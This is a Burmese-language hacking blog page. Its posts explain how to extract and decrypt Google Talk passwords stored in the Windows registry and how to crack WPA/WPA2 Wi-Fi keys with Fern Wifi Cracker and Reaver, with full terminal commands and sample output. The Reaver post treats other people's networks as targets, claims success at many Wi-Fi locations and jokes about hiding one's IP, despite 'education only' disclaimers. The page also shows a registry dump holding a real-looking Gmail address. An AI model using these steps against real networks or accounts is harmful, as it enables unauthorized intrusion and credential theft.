Google Password ၏ လွ်ိဳ႕၀ွက္ခ်က္

အဆင္ေျပသလိုဖတ္ပါ အထစ္အေငါ့ေလးမ်ားရွိနိုင္သည္

Goolge account ကို Gmailနဲ႕ အျခား service ေတြမ်ားစြာက အသံုးျပဳၾကပါတယ္။Google ရဲ႕ desktop application မ်ားဟာ ေနာင္မွာအသံုးျပဳႏိုင္ဖို႕အတြက္ Google account password ကိုသိမ္းဆည္းထားတတ္ပါတယ္။ Internet Explorer၊ Firefox၊ Chrome တို႕လို Web browser အမ်ားစုကေတာင္
၀င္ေရာက္ခဲ့တဲ့ web site ေတြအတြက္ login password ကို သူတို႕ရဲ႕လ်ိဳ႕၀ွက္ေနရာတစ္ခုမွာ သိမ္းဆည္းထားတတ္ၾကပါတယ္။
ဒီမွာေတာ့ password ေတြ သိမ္းဆည္းထားတတ္တဲ့ေနရာေတြနဲ႕ password ေတြကို ဘယ္လို decrypt လုပ္မယ္ဆိုတာကို ေဖာ္ျပမွာျဖစ္ပါတယ္။
decrypt encrypt နဲ့အလုပ္မ်ားမေနဖို့ေတာ့လိုတယ္ :D တျခား sotware ေတြရဲ့key ေတြဘာေတြထက္ ဒီလိုဟာေလးေတြ decrypt encrypt တက္ရင္ေတာ့လား
ဘာသာမျပန္တက္ေသးရင္ေတာင္ ဒီလိုဟာေလးေတြ ဘယ္ေနရာမွာရွိေနလဲ သိရင္ေတာင္ ရတနာသိုက္ လက္၀ယ္ပိုက္ ေနရသလိုပါပဲ ရတနာေတြေတာ့ ကိုယ္ရွာမွကိုယ္ရမွာေပါ့ :P

GTalk ကေတာ့ Google account နဲ႕ပတ္သက္တဲ့အခ်က္အလက္ေတြကို registry ထဲက ေအာက္ပါေနရာမွာ သိမ္းဆည္းပါတယ္။

HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts

ဒါေတြကေတာ့ window မွာေျပာတာ linux မွာေတာ့လား ဖိုင္တစ္ဖိုင္ေတာင္မနည္းရွာယူေနရတယ္ အေခါ္အေ၀ါ္မွမတူတာကိုး
linux ရဲ့ ဘယ္နားမွ ဖြတ္ထားလည္းဆိုတာေနာက္ေန့ရွာျကည့္ဦးမယ္ အခုေတာ့ ဆက္ေျပာမယ္ ဒီအေကာင္လည္းေတြ့ေတာ့ေတြ့တယ္ ဒါေပမဲ့ သူျပထားတာေတြမေတြ့ဘူးျဖစ္ေနလိမ့္မယ္

Google ရဲ႕ password ကိုေတာ့ ‘pw’ ဆိုတဲ့ registry တန္ဖိုးနဲ႕ သိမ္းဆည္းပါတယ္။ဒါေတြဖတ္တက္ရင္ေတာ့ ေရြွပဲ :P
ခက္တာက ရတနာသိုက္ညြွန္းထက္ေတာင္ဖတ္ရခက္ေနေသးတယ္ ေပးထားတဲ့ password က ၁၂၃၄၅ တင္ေနာ္ အဲဒါကို အဲသလိုျကီးမွတ္ေနတာ
ိတိန္ password ေတြေျပာေနမိျပီ စိတ္ခ်ပါ အေကာင့္နာမည္မပါပါဘူး ရမ္းရိုက္ျပီး ၀င္ျကည့္တာ :D

[HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts\mcxeros@gmail.com]

"pw"="##,\"0-$(+$00.,\"$.!+/\"-/-*%,!,(+\"&$#0)+$*(+#+%--(($!0-#+%#.,'&',\"%,0*$+)!)!'-/0(+$#/0*,&(%$\"0+.+(.$/0,,0(''#&-,%(*,)0.,*(*$&0/,/(,#0,+*'-$)$!$'/+)-0\"\"*-!,##'#0#'&$'0$,((/(,0%,-(\"$!0&,\"(\"$.0','(\"+00\"\"'(('+%,./&*)/*.!-%0#)$0),-.,/0,,0(+#)*!()$/\",(/*\"%*(&0/,/('-/'%'&-(!,0%(-)/%/-*!$/%+!%%'%!-&($)+$+"
"px"="talk.google.com"
"bpx"="talkx.l.google.c"
"ct"=dword:00000001
"k"=dword:00000001
"pt"=dword:00001466
"mailstate"=hex:82,fc,e7,85,2f,01,00,00,69,4e,41,00,ab,2b,f8,12

GTalk ဟာ Google account password ကို Windows ရဲ႕ Cryptography function ေတြသံုးျပီး encrypt လုပ္ပါတယ္။
ဒါေတြလိုက္ရွာတာ ေတြ့ေတာ့ေတြ့တယ္ ဒါေပမဲ့ အဲဒီလိုမေပါ္ဘူးလို့ေတာ့ မေအာ္နဲ့ေနာ္ အဲဒီေလာက္လြယ္ရင္ လူတိုင္း လုပ္ကုန္ျပီ Edu only post ပါဆိုမွပဲ
search in google ေပါ့

Encrypt လုပ္ထားတဲ့ password ကိုေဖာ္ဖို႕လုပ္ေဆာင္ပံုအဆင့္ဆင့္ကေတာ့

(၁) GTalk Account ေတြရဲ႕ registry key ကိုရွာျပီး သိမ္းဆည္းထားတဲ့ account အမည္နဲ႕ encrypt လုပ္ထားတဲ့ password တို႕ကို ရယူပါတယ္။

(၂) Windows ကို logon လုပ္ထားတဲ့ username နဲ႕ system ရဲ႕ domain name တို႕ကို ရယူပါတယ္။

(၃) User name ရဲ႕ hash key ကိုဖန္တီးပါတယ္။ Domain name ကုိလဲ hash ထုတ္ပါတယ္။ ဒါကေတာ့ ၁၆လံုးစာရွိတဲ့ entropy data ကိုဖန္တီးဖုိ႕ျဖစ္ပါတယ္။

(၄)encrypt လုပ္ထားတဲ့ password ကို magic ဂဏန္းေတြနဲ႕ hash လုပ္ပါတယ္။

(၅) ေနာက္ဆံုးမွာေတာ့ အဆင့္(၄)မွာ ျပဳျပင္ေျပာင္းလဲလိုက္တဲ့ password နဲ႕ entropy data တို႕ကို password ေဖာ္ဖို႕အတြက္ Crypt32.dll ရဲ႕ CryptUnprotectData function
ဆီျဖတ္သန္းေစပါတယ္။

PUSH EAX

PUSH EBX

ADD EDI,4
PUSH EDI ; ntdll.7C910228
CALL DWORD PTR DS:[<&CRYPT32.CryptUnprotectData>]
TEST EAX,EAX
JNZ SHORT googleta.004235BA
CMP DWORD PTR DS:[5CF0AC],2
JG SHORT googleta.00423587

gmail ကေနတဆင့္ password ဘယ္လိုျပန္ေဖာ္လို႕ရတယ္ဆိုတဲ့ အေသးစိတ္ကို ေအာက္ပါ link
မွာဖတ္ရႈႏိုင္ပါတယ္။ အေပါ္ကဟာေတြဘာေတြလဲမေမးနဲ့ မသိဘူး သူ့မွာပါတဲ့အတိုင္းဘာသာျပန္တာ နားလည္တက္က်ြမ္းလို့ဟုက္ဘူး ေအာက္မွာေသခ်ာေရးထားတယ္ ဖတ္ျကည့္

http://securityxploded.com/googlepasswordsecrets.php

ဒီဆိုက္မွာ Google Account အျပင္ အျခား account ေတြရဲ႕ password ကို ဘယ္လိုျပန္ေဖာ္လို႕ရတယ္ဆိုတာ ေရးသားထားတဲ့အျပင္ hacking tool အခ်ိဳ႕ကိုပါ ေပးထားပါတယ္။
(တကယ္လို႕ သင့္ရဲ႕ password ေတြကို တစ္စံုတစ္ေယာက္က ခိုးသံုးေနတယ္လို႕ သံသယရွိရင္ ဒီ tool ေတြသံုးျပီး စစ္ေဆးႏိုင္ပါတယ္။ သူမ်ား password ကို ခုိးသံုးဖို႕
သူတစ္ပါးကို skill ျပဖို႕ စိတ္ကူးနဲ႕ေတာ့ ဒီ tool ကိုဘယ္ေတာ့မွ အသံုးမျပဳပါနဲ႕။)
သို့ေသာ္ ဒီလို tools ေတြကလည္း စိတ္မခ်ရပါဘူး တကယ့္ password အမွန္မထည့္မိဖို့လည္းလိုပါေသးတယ္

Google Password Decryptor ကိုေတာ့ Google မွာ download လုပ္ႏိုင္ပါတယ္။
လက္သည္ခ်ည္းပဲ အားမကိုးပါနွင့္ :D

ေရးလို့လဲျပီးေရာ ဖိုင္ေျဖတာ ဖိုင္ခ်ုပ္တာနဲ့ပဲ ရြာပတ္သြားတယ္
ေနာက္ေန့ Kali linux မွာ Gtalk hack နည္းတင္ေပးမယ္

ေက်းဇူးတင္ပါတယ္

Read More

How to install Kali LInux by Myanmar

Kali Linux အေျကာင္းေရးထားေသာ English စာအုပ္ကို တက္နိုင္သေလာက္
အဓိကအေျကာင္းအရာမ်ားကို ျမန္မာဘာသာသို့ျပန္ဆိုေရးသားသည္
ဘာသာျပန္အလြဲမ်ားရွိနိုင္သည္ ထို့ေျကာင့္ English မူရင္းစာအုပ္ပါတြဲတင္ေပးလိုက္သည္

English စာအုပ္ 
Myanmar စာအုပ္
PDF ဖုိုင္စာအုပ္
ေက်းဇူးတင္ပါသည္

Read More

How to customize Desktop in Kali Linux (install KDE Desktop Environment)

Kali linux ရဲ့ မူလပါရွိေသာ Desktop မွာ Gnome ျဖစ္ပါတယ္
Linux ရဲ့ Disto ေတာ္ေတာ္မ်ားမ်ားဟာ Desktop Environment ကို စိတ္ျကိုက္ျပင္ဆင္နုိင္ပါတယ္
အလွဆင္မွုမ်ားစြာလည္းျပုလုပ္နုိင္ပါတယ္ ဒါေတြဟာ Window ထက္ Linux ရဲ့ အားသာခ်က္ေတြထဲက
တစ္ခုေပါ့ဗ်ာ

Gnome Desktop Environment

KDE Desktop Environment

KDE Desktop Environment ကေတာ့ auto ပါလာတာမဟုက္ေပမဲ့ free download လုပ္ရံုနဲ့
သင့္ Desktop ကိုပိုမိုဆန္းျပားသြားေစမွာပါ ဒါကေတာ့ က်ြန္ေတာ့္ Desktop ပါ

Terminal ကိုဖြင့္

root@kali:~# apt-get install kde-full

ဆိုရပါျပီ

ေက်းဇူးတင္ပါသည္

Read More

How to install fern-wifi-cracker in Linux (not for Kali & Backtrack)

အရင္ဆံုး Doanload

http://code.google.com/p/fern-wifi-cracker/downloads/list မွာ Fern-Wifi-Cracker_1.6_all.deb
ဖိုင္ကို ရယူပါ

ျပီးရင္ Desktop ေပါ္တင္ထားပါ

root@kali:~# cd Desktop
root@kali:~/Desktop# ls
root@kali:~/Desktop# dpkg -i Fern-Wifi-Cracker_1.6_all.deb

ဒါဆိုရင္ေတာ့ Install လုပ္လို့ျပီးပါျပီ
Ubuntu မွာဆို Sudo ေတြနဲ့ရိုက္လိုက္ပါ

ေက်းဇူးတင္ပါသည္

Read More

How to hack wifi with wordlist in Fern Wifi Cracker (KAlI LINUX)

Wordlist အသံုးျပုျပီး wifi ဘယ္လို hack မလဲဆိုတာအတြက္

How to hack wifi with wordlist in Fern Wifi Cracker (KAlI LINUX)

Applications >> Kali Linux >> Wireless Attack >> fern wifi cracker

လြယ္လြယ္ေလးပါ

1. Select Interface ကို Click လိုက္ wifi ရွိရင္ က်လာလိမ့္မယ္

2. Scan for Access Points ကို Click Active ဆို OK

3. Wifi WPA 1 Detected ဆို wifi 1 ခုရွိတာပဲ

4. Wifi WPA 1 Detected ကို Click လိုက္

5. Browse ကို Click ျပီး Wordlist ရွိတဲ့ေနရာကိုေရြးေပးလိုက္
6. WPS Attack ကိုေရြး
7. ျပီးရင္ Wifi Attack ကို Click
8. ဒါဆိုသူ့ဘာသာ attack လုပ္ေနျပီ ကုိယ္ေရြးထားတဲ့ Wordlist ထဲမွာပါရင္သိရမယ္ မပါရင္ မသိရဘူး
9. Finished ျပည့္သြားရင္ Password ပါေသာ Wordlist ဆို Password ထြက္လာပါလိမ့္မည္

စာအုပ္အျဖစ္ Downlaod ရယူနုိင္ပါသည္

ေက်းဇူးတင္ပါသည္

Read More

How to install Reaver in Linux (not for kali)

သူငယ္ခ်င္းေတြထဲမွာ Backtrack သံုးေနတဲ့သူရွိသလို Ubuntu သံုးတဲ့သူလည္းရွိေကာင္းရွိနိုင္ပါတယ္
ဒီေတာ့ Reaver မပါရွိေသာ Linux OS မ်ားအတြက္ Reaver Install လုပ္နည္းကိုေဖာ္ျပေပးပါမယ္

root@kali:~# sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev

ျပီးရင္ Download လုပ္ရပါမယ္

http://code.google.com/p/reaver-wps/downloads/list မွ reaver-1.4.tar.gz ကိုေဒါင္းလိုက္ပါ

ျပီးရင္ Desktop ေပါ္မွာထားလိုက္ပါ

root@kali:~# cd Desktop

root@kali:~/Desktop# ls

root@kali:~/Desktop# tar xvf reaver-1.4.tar.gz

root@kali:~/Desktop# cd reaver-1.4

root@kali:~/Desktop/reaver-1.4# cd src

root@kali:~/Desktop/reaver-1.4/src#./configure

root@kali:~/Desktop/reaver-1.4/src#make

root@kali:~/Desktop/reaver-1.4/src#make install

ဒါဆိုရင္ေတာ့ Reaver Install လုပ္လို့ျပီးပါျပီ reboot or logout လုပ္လုိက္ပါ
ျပီးရင္ေတာ့ Terminal မွာ Reaver --help လို့ရိုက္ျကည့္ပါ

Terminal ကေန တိုက္ရိုက္သြင္းမယ္ဆိုရင္ေတာ့

sudo apt-get install aircrack-ng reaver

ေက်းဇူးတင္ပါသည္

Read More

How to Cracking WPA and WPA2 key with Reaver in Kali Linux (No Dictionary - Wordlist)

Reaver ကိုသံုးျပီးေတာ့ hack တာပါ Education post အေနနဲ့ျပသေပးမွာျဖစ္ပါတယ္

wifi ကလည္း မိမိ၏ဖုန္းမွထုတ္လြွင့္ေသာလိုင္းကို attack လုပ္ျကည့္မွာပါ

အရင္ဆံုး Terminal ထဲမွာေရးလိုက္ပါ

root@kali:~# airmon-ng

Interface                      Chipset                         Driver

wlan0                     Atheros AR9485              ath9k - [phy0]

root@kali:~# airmon-ng stop wlan0

Interface                       Chipset                       Driver

wlan0                       Atheros AR9485            ath9k - [phy0]

                                                                  (monitor mode disabled)

root@kali:~# airodump-ng wlan0 

ဒီအဆင့္ထိျပီးသြားရင္ေတာ့ ေနာက္တစ္ဆင့္သြားထပ္သြားမယ္

ေအာက္ကပံုလိုမ်ိုးလိုင္းေတြက်လာရင္ေတာ့ ok ပါျပီ

 

-->

BSSID 02:03:7F:C5:99:C3 ESSID aunglay CH 1 ENC WPA2 စတာေတြပါ၀င္တဲ့ လိုင္းက က်ြန္ေတာ့္ ဖုန္းလိုင္းပါ

ဒီ Terminal ကိုမပိတ္ပဲ ေနာက္ထပ္ Terminal အသစ္တစ္ခုထပ္ဖြင့္လိုက္ပါ

root@kali:~# wash -i wlan0 -c 1 -C -s

အနီေရာင္ခ်ယ္ထားေသာ 1 ေနရာတြင္ တျခား နာပတ္မ်ားျဖစ္ေနနိုင္သည္

Target ရဲ့ CH ကိုကူးယူျခင္းျဖစ္သည္

က်ြန္ေတာ့္လိုင္းေအာက္က THA Call ဆုိတဲ့လိုင္းကို hack မယ္ဆုိ 7 ေပါ့ဗ်ာ

02:03:7F:C5:99:C3 ဆိုတာကလည္း ေျပာင္းလဲနိုင္တယ္ေနာ္

ကိုယ္ target wifi ေပါ္လာျပီဆိုရင္ေတာ့ Ctrl+c နွိပ္ျပီး ရပ္လိုက္ပါ

root@kali:~# reaver -i wlan0 -b 02:03:7F:C5:99:C3 –fail-wait=360

Reaver v1.4 WiFi Protected Setup Attack Tool

Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from 02:03:7F:C5:99:C3

[+] Associated with 02:03:7F:C5:99:C3 (ESSID: aunglay) 

မရွင္းေသးရင္ ေအာက္ကပံုကိုျကည့္ပါ

ဒီေနရာမွာေတာ့ အခ်ိန္ေပးရပါတယ္ wordlist နဲ့တိုက္စစ္တာမဟုက္တဲ့အတြက္ password ေပးထားမွုအေပါ္ မူတည္ျပီးေျပာင္းလဲနိုင္ပါတယ္

ေအာင္ျမင္သြားရင္ေတာ့

[+] WPS PIN : '123456789'

[+] WPA PSK : 'asdfjhjk'

[+] AP SSID : '744edz'

ဆိုျပီးေပါ္လာပါလိမ့္မယ္ Hacking အပိုင္းဒီမွာျပီးပါျပီ

သို့ေသာ္ တခ်ို့ေတြက အထြန့္တက္ တက္က်ေသးတယ္ အကယ္၍ ပိုင္ရွင္က password ခိ်န္းသြားရင္ေရာတဲ့ေလ ဒါဆိုလည္းလြယ္လြယ္ေလးပါ WPS PIN ရထားတာပဲ

Reaver –help ရိုက္ျကည့္လိုက္ပါ

Advanced Options:

-p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin

ဆိုတာပါရွိပါတယ္ PIN သိရင္ ျပန္ယူလို့ရပါတယ္ဗ်ာ Password ဘယ္ေလာက္ခ်ိန္းခ်ိန္းပါ

PIN အေျကာင္းကိုေတာ့ ေနာက္ပိုင္းမွာ အက်ယ္ေရးသားေပးပါဦးမယ္

ယခုနည္းကလည္း က်ြန္ေတာ္ကိုယ္တိုင္ စမ္းသပ္အသံုးျပုေနေသာ နည္းပါ wifi လြွင့္ထားတဲ့

ေနရာေတာ္ေတာ္မ်ားမ်ားမွာ စမ္းတာေအာင္ျမင္ပါတယ္ အဲတစ္ခုပဲ IP hite ထားပါ :P

စာအုပ္ပါ တင္ေပးထားပါတယ္
ဒီမွာ ေဒါင္းပါ

ေက်းဇူးတင္ပါသည္

Read More